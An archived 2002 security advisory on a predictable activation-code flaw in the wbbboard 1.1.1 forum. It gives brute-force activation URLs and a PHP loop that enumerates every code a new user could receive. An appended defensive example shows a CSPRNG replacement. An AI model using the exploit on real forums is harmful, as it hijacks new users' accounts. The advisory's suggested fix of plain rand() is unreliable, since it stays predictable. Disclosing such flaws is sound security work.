wbbboard 1.1.1 registration new_users_vulnerability

2002-05-28T00:00:00
ID SECURITYVULNS:DOC:2994
Type securityvulns
Reporter Securityvulns
Modified 2002-05-28T00:00:00

Description

wbbboard 1.1.1 registration new_users_vulnerability

wbbboard: I can't find any contact info in the credits :( I sent a message to wbbhacks.de and mywbb.de (support forums); they didn't reply for 3 days (I think that's enough).

Affected program    : wbbboard 1.1.1
Vendor              : http://www.woltlab.de/
Vulnerability-Class : security bug
OS specific         : No
Remote              : Yes
Problem-Skill       : High for users waiting for registration activation
                      None for activated users

SUMMARY

wbbboard is a PHP & MySQL based forum.

Here is some code (register.php):

    // the activation code comes from mt_rand() seeded with the seconds field of the current time
    $datum = date("s");
    mt_srand($datum);
    $z = mt_rand();
    $db_zugriff->query("INSERT INTO bb".$n."_user_table
        (username,userpassword,useremail,regemail,groupid,regdate,lastvisit,lastactivity,activation)
        VALUES
        ('$name','$password','$email','$email','$default_group','$time','$time','$time',$z)");


After that, the script mails user@mail.dom a URL for activation. Here is some code from action.php:


    if($action=="activation") {
        $result = activat($userid,$code);
        if($result == 1) eval ("\$output = \"".gettemplate("error1")."\";");
        if($result == 2) eval ("\$output = \"".gettemplate("error22")."\";");
        if($result == 3) eval ("\$output = \"".gettemplate("error23")."\";");
        if(!$result) {
            // activation succeeded: the user is logged in via session and cookies
            $user_id = $userid;
            eval ("\$output = \"".gettemplate("note21")."\";");
            $user_password = getUserPW($userid);
            session_register("user_id");
            session_register("user_password");
            setcookie("user_id", "$user_id", time()+(3600*24*365));
            setcookie("user_password", "$user_password", time()+(3600*24*365));
        }
        $ride = "main.php?styleid=$styleid$session";
    }

IMPACT

You can steal a NEW user's account together with its password.

EXPLOIT

Register in the forum and you will receive a message like this:

To continue registration http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322

Now you know how many users are on the forum and can hijack users with userid=346 (for example).

HEART OF EXPLOIT

| $datum = date("s"); |
| mt_srand($datum);   | this code results in only 30 original integer words :)
| $z = mt_rand();     | I think it is not so hard to bruteforce


http://forum.dom/forum/action.php?action=activation&userid=346&code=1898087491
http://forum.dom/forum/action.php?action=activation&userid=346&code=1309289693
....
http://forum.dom/forum/action.php?action=activation&userid=346&code=356268007

You can get all variations with this script:

    <?php
    for($i=0; $i<60; $i++)
    {
        mt_srand($i);
        echo mt_rand()."<BR>";
        //   ^^^^^^^^^ here you are :)
    }
    ?>

SOLUTION: use simple rand() or the really unpredictable md5(uniqid(rand(),1))
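
An added example, not part of the original advisory or of wbbboard's code: it counts how many distinct activation codes the register.php scheme can produce and sets a CSPRNG-based generator with a constant-time check beside it. All function names are hypothetical, and it assumes PHP 7.0 or later (for random_bytes()), a swapped-in technique rather than the md5(uniqid(rand(),1)) named in the SOLUTION line.

```php
<?php
// Added example; all function names here are hypothetical.

// Scheme from register.php: the seed is date("s"), so only the seconds value matters.
function weak_activation_code(int $second): int
{
    mt_srand($second);
    return mt_rand();
}

// Replacement generator (assumption: PHP >= 7.0 for random_bytes()).
function strong_activation_code(): string
{
    return bin2hex(random_bytes(16)); // 128 bits from the OS CSPRNG
}

// Keep only a hash of the code in the user table; compare in constant time.
function code_matches(string $storedHash, string $submitted): bool
{
    return hash_equals($storedHash, hash('sha256', $submitted));
}

// Count the distinct values a generator yields over every possible seconds value.
function distinct_codes(callable $gen): int
{
    $seen = [];
    for ($s = 0; $s < 60; $s++) {
        $seen[(string) $gen($s)] = true;
    }
    return count($seen);
}

$weak   = distinct_codes('weak_activation_code');
$strong = distinct_codes(function (int $s): string {
    return strong_activation_code(); // ignores the seconds value entirely
});
printf("weak scheme:   %d distinct codes over all possible seeds\n", $weak);
printf("strong scheme: %d distinct codes in 60 draws\n", $strong);

// Activation check: constructed sample values, not taken from a real forum.
$code   = strong_activation_code();
$stored = hash('sha256', $code);
var_dump(code_matches($stored, $code));
var_dump(code_matches($stored, '1563109322'));
```

The weak count is bounded by the number of seed values and does not grow with the number of registrations, which is the property the advisory relies on; the replacement's code space does not depend on the clock at all.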